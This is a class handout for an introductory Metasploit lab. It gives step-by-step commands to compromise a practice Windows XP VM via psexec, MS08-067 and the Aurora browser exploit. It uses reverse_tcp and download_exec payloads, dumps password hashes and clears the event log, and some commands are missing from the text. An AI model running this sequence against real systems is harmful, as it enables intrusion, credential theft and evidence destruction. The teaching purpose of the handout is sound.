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Metasploit Intro: Class
This sheet is meant to be a convenient set of notes for the exercises
Adrian will be demonstrating in class. These are the commands used in the
demos for your reference, along with why they were used. Items in
blue are things you type, green
are things you click, gray is something optional that you may
want to play with latter and red is just to
grab your attention.
Exercise 0: Getting into BackTrack 4
Login with "root" as the user name and "toor"
as the password. So we can more easily get around, we will also start up X
Then, since the network starts off as disabled (a good
idea so as not to announce yourself on the network till you are ready) let's
bring it up and note our IP:
/etc/init.d/networking start
Exercise 0.5: Login to XP
Log in with "IndySploit" as the user name and "password"
as the password. Then note our IP (Students will not need to do this step
unless they brought their own XP VM):
Exercise 1: A few simple commands for Metasploit in BT4
I plan to point these commands out, but not run them to completion.
Grab the latest Metasploit Modules:
If you want to script some stuff later, look into:
msfcli | less
There is also the GUI, but we will not be using it in class:
Exercise 2: Let's Demo Metasploit MSFWeb interface in BT4
To start off easy let’s use the web interface. It is not as well supported
as msfconsole, but it’s prettier to show management the easy of exploitation
(the ampersand is there so we can keep typing commands at the shell):
Now let's start FireFox and go to:
You will most likely have to disable NoScript to het the web interface to
work correctly.
Now that we have the web interface up, let's look for a module to use. Click
"Exploit", and on the search bar enter:
On the list that comes up, choose "Microsoft
Windows Authenticated User Code Execution", "Automatic"
and for payload choose "windows/vncinject/reverse_tcp"
For the RHOST enter the IP of the XP box. SMB Password and SMB User are
"password" and "IndySploit"
respectively. For LHOST enter the BT4 box's IP. Not clicking the "Launch Exploit"
button should be all we need to do to get a lovely VNC session.
Exercise 3: Let's use MSFConsole under BT4
Fire up the MSFConsole:
Now note that you can type normal *nix commands for inside of MSFConsole:
When in doubt, scream and shout:
Also note, tab completion works.
Now in MSFWeb we did not use a real vulnerability (psexec really is a
feature), so let’s try an exploit this time. First let’s find an exploit:
search netapi
Ok, we found one I want to use, let's find out more about it:
info windows/smb/ms08_067_netapi
Sounds good, let's use it:
use exploit/windows/smb/ms08_067_netapi
Now we need to set some options. We can use "set" to just set them this one
time, or use "setg" so they stick around if we switch to another module. Use
"back", "unset" or "unsetg" if you screw up and have a typo. Let select a
payload to use:
setg payload windows/meterpreter/reverse_tcp
We could also set an encoder to use, but this is optional:
set encoder x86/shikata_ga_nai
Ok, what options do we need to set?
Anything else cool we can do to customize the pwnage?
show advanced
Ok, let’s set some required options that don’t already
have defaults, fill in the items in brackets accordingly:
rhost <XP box's IP>
setg lhost <BT4 box's IP>
Now let’s tell Metasploit to fire off the exploit, and see
if things work:
If that worked, we should have a Meterpreter session. Martin will talk more
on Meterpreter later, but here are a few Commands to try:
<We are now in Meterpreter>
Get some help:
Let’s get some info about the system:
Get a command prompt on the exploited box:
Get back to the MSFConsole prompt:
<We are now out of Meterpreter>
Ok, what sessions are there?
help sessions
Ok, let's get back into our Meterpreter session:
sessions -i 1
<We are now in Meterpreter>
We will try to run a command on the remote box, and see it in the process
execute -f notepad.exe
Grab some hashes:
Clear the event log:
Run a Meterpreter script:
run scraper
A bunch of nifty stuff should now be in /root/.msf3/logs/scraper/
If you have updated to the latest version, this is a also a fun command:
Exercise 4: Extra credit, start a server on your box and do a drive by
browser exploit
(You will need to have an Internet connection, used
msfupdate to get the latest modules, and have a webcam hooked up to the
exploited box. Or you could just modify these commands to work for your
Under BT4 VM :
use exploit/windows/browser/ms10_002_aurora
set uripath pwnme
set payload windows/download_exec
set url
On the XP box, web surf to:
http://<ip of BT4 box>:8080/pwnme
Under BT4, web surf to:
http://<ip of XP box>
Useful Links: